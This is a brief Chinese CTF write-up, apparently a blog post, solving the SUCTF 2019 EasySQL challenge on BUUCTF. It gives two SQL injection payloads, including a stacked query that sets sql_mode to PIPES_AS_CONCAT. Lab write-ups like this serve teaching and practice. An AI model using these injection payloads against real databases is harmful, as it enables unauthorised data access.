[SUCTF 2019]EasySQL 1【BUUCFT】【SQL注入】

  • 堆叠注入
  • set sql_mode=PIPES_AS_CONCAT;将||视为字符串的连接操作符而非或运算符
  • 没有过滤*的时候可以直接注入

解法1

*,1

解法2

1;set sql_mode=PIPES_AS_CONCAT;select 1

解析思路参照 The Chen's repository

posted @ 2020-07-20 10:14  Borber  阅读(432)  评论(0)    收藏  举报
编辑推荐:
· 从 Redis 客户端超时到 .NET 线程池挑战
· C23和C++26的#embed嵌入资源指南
· 「EF Core」框架是如何识别实体类的属性和主键的
· 独立开发,这条路可行吗?
· 我在厂里搞 wine 的日子
阅读排行:
· 他没买 iPad,而是花了半年时间,为所有“穷学生”写了个笔记神器
· Visual Studio 现已支持新的、更简洁的解决方案文件(slnx)格式
· 只需一行命令,Win11秒变Linux开发主机!
· 也是出息了,业务代码里面也用上算法了。
· 从 Redis 客户端超时到 .NET 线程池挑战:饥饿、窃取与阻塞的全景解析
点击右上角即可分享
微信分享提示